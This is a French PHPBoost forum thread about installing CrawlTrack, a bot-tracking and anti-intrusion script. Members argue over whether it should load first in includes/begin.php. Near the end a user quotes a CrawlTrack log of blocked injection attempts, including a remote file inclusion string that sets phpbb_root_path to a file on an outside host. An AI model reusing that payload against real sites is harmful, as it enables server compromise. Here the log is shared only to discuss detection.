Aide pour CrawlTrack... [Réglé]
ZTk Membre non connecté
Booster Roquette
-
Booster Roquette
- Voir le profil du membre ZTk
- Inscrit le : 13/01/2008
- Site internet

Voilà j'aimerais un petit coup de pouce (et peut-être vous faire connaître ce script?)! afin d'intégrer CrawlTrack sur mon site.
Voici la description correspondant à ma demande: site du script
En gros un système de protection est d'infos assez sympathique, et je cherche à intégrer le tag pour le faire fonctionner.
Donc j'ai essayé en le mettant sur le premier index.php à la racine comme ça:
Code PHP :
<?php $crawltsite=1; require_once("/****/*******/***/crawltrack/crawltrack.php"); header('location: http://mixomatik.fr/news/news.php'); ?>
Mais cela ne fonctionne pas, sauriez vous me dire ou inclure ce tag s'il vous plait?
Merci beaucoup!
Édité par ZTk Le 26/06/2008 à 18h38
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Code PHP :
<? include('../includes/begin.php'); define('TITLE', 'CrawlTrack'); include('../includes/header.php'); $crawltsite=1; require_once("/crawltrack/crawltrack.php"); include('../includes/footer.php');
Ne connaissant pas le script je ne peux pas affirmer que ça va marcher, mais ça vaut le coup d'essayer.
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
Visiteur
Boosteur Inactif
J'ai conseillé, après avoir étudié un peu les fichiers de phpboost, d'inclure le code dans includes/begin.php.
Cet include doit être lu impérativement en premier, avant tout autre code pour éviter toute injection de code hack avant !
Ben.popeye, peut tu me dire quelle est la toute première requête faite ?
Cela va déterminer quel fichier doit contenir le code.
A ++
ZTk Membre non connecté
Booster Roquette
-
Booster Roquette
- Voir le profil du membre ZTk
- Inscrit le : 13/01/2008
- Site internet

Et merci ben pour ta réponse
Édité par ZTk Le 26/06/2008 à 20h56
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Dans ce cas il faut effectivement le mettre dans includes/begin.php, c'est de toutes façons le premier fichier appelé systématiquement.
Citation :
Cet include doit être lu impérativement en premier, avant tout autre code pour éviter toute injection de code hack avant !
Peux-tu détailler de quoi tu as peur ?
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
ZTk Membre non connecté
Booster Roquette
-
Booster Roquette
- Voir le profil du membre ZTk
- Inscrit le : 13/01/2008
- Site internet
Bref... Un grand Merci Ben (et Sylver bien entendu
)
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
Visiteur
Boosteur Inactif
L'important que ce soit au tout début, c'est que ce logiciel à pour but, outre la lecture très détaillée des passages des robots, des pages lues, visitées, des visiteurs envoyés par les moteurs de recherche, des mots clefs utilisés...
Et bien que c'est un logiciel de protection anti-hack !
Il lutte principalement contre toute injection de code pour l'intrusion et se comporte ensuite selon notre volonté ( nous informer et/ou bloquer sur cette attaque )
Donc, si il n'est pas chargé en premier, l'intrusion risque de passer avant ! Ce serait dommage !
Site de crawltrack: http://www.crawltrack.fr/fr/
A ++
Édité par Visiteur Le 26/06/2008 à 22h49
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Par exemple quel genre d'attaque permet-il d'éviter (que nous ne protégeons pas).
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
ZTk Membre non connecté
Booster Roquette
-
Booster Roquette
- Voir le profil du membre ZTk
- Inscrit le : 13/01/2008
- Site internet
12 hr 46 mn
13 hr 54 mn
Citation :
Paramètres utilisés pour les tentatives d'injection de code:
preview=
preview=
Fichier/script que le hacker a tenté d'injecter:
1//includes/functions_admin.php?phpbb_root_path=http://warsector.ru//access
2008.log?
1//functions_admin.php?phpbb_root_path=http://warsector.ru//access2008.log?
preview=
preview=
Fichier/script que le hacker a tenté d'injecter:
1//includes/functions_admin.php?phpbb_root_path=http://warsector.ru//access
2008.log?
1//functions_admin.php?phpbb_root_path=http://warsector.ru//access2008.log?
Après c'est peut-être autre chose que des attaques je sait pas trop
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Les tentatives d'injection de code avec preview ne sont pas forcément des attaques, nous utilisons assez souvent l'attribut HTTP preview sur PHPBoost pour indiquer qu'il s'agit d'une prévisualisation.
J'ai d'ailleurs peur que ce script arrête l'exécution de la page dans un tel cas, ce qui nuirait au fonctionnement de PHPBooost.
Comme je l'ai indiqué plus haut, je ne vois pas ce qu'apporte ce script niveau sécurité, si ce n'est des conflits... A vous de me convaincre, mais ce que je vois là ne fait que confirmer mon point de vue.
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie
